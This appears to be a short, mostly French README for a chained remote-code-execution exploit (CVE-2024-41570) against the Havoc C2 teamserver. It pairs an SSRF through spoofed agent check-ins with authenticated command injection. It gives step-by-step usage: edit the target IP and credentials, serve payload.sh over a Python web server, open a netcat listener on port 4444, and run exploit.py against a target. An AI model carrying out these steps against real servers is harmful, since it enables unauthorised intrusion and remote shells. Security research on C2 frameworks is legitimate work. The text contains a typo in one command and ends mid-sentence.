
Ceci est une RCE chaînée dans le framework Havoc C2 utilisant les pocs de github.com/chebuya et github.com/IncludeSecurity
Ceci est une RCE chaînée (CVE-2024-41570) dans le framework Havoc C2.
Injection de commande : Havoc est vulnérable à l'injection de commande permettant à un utilisateur authentifié d'exécuter des commandes sur le Teamserver. Affecte les versions 0.3 jusqu'à la dernière version 0.6. Le profil par défaut de Havoc contient des mots de passe codés en dur, donc un opérateur C2 assez négligent pour utiliser le profil par défaut sur un réseau public peut être immédiatement exploité.
SSRF : Cette vulnérabilité est exploitée en usurpant l'enregistrement et les checkins d'un agent démon pour ouvrir un socket TCP sur le teamserver et lire/écrire des données à partir de celui-ci. Cela permet aux attaquants de fuiter les IP d'origine des teamservers et bien plus.
Chaîne : Abuser du SSRF pour délivrer une charge utile d'injection de commande authentifiée.

1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh
-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)
# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345
Crédits à @chebuya et